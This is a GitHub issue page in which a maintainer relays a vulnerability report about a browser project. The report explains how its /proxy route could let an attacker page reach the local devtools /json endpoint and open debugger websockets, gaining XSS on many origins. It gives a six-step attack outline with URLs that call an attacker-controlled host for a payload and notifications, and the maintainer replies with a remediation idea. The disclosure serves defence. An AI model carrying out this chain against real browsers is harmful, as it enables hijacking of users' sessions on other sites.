Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[security] Devtools access vulnerability #56

Open
spolu opened this issue Jul 23, 2014 · 1 comment
Open

[security] Devtools access vulnerability #56

spolu opened this issue Jul 23, 2014 · 1 comment
Labels
Bug

Comments

@spolu
Copy link
Member

spolu commented Jul 23, 2014

As reported by Adam Baldwin from andyet over email

Getting access to devtools

I'm curious to know what the /proxy route is actually used for on the
mod_strip extension? It allows for some interesting things. Specifically
one can use that route to load a page controlled by an attacker and
execute code.

Further then that code could attempt to locate the port the devtools are
running on and find the various endpoints for the open tabs at the /json
endpoint.

Normally this would be blocked by same origin policy but because of the
proxy route it's possible to get those endpoints. Having the content of
that json file means a debugger websocket connection can be made to each
of those tabs and code executed in the context of those tabs, which
gives xss on a variety of origins.

It would be pretty messy to exploit but here is how I would go about it.

  1. Make requests to the following url to find the local port that allows
    proxy.
    127.0.0.1:PORT/proxy?url=http://evilpacket.net
  2. Make requests to the following url to find the dev tools port that
    will give me the json endpoints. When it hits the right one it will
    notify the external service and we can correlate the 2 events.
    http://127.0.0.1:PORT/devtools/devtools.html?ws=evilpacket.net
  3. Redirect user to the following url so that we can use same origin
    policy to get the json in the next step
    127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://evilpacket.net/payload
  4. Get the JSON via a request to
    127.0.0.1:PORT_FROM_STEP_1/proxy?> url=http://127.0.0.1:PORT_FROM_STEP_2/json
  5. Parse json for ws url's
  6. Make web socket connections to each of those and do whatever with the
    content on the tab's, etc acting as the devtools debugger over that ws
    channel.
@spolu
Copy link
Member Author

spolu commented Jul 23, 2014

The proxy is used today to proxy the favicons in order to sniff their color. We could automatically retrieve the favicon from the module server side and pass ids instead of URLs to the client side to retrieve the content of these favicons, removing the need for the proxy.

@spolu spolu added the Bug label Jul 23, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@spolu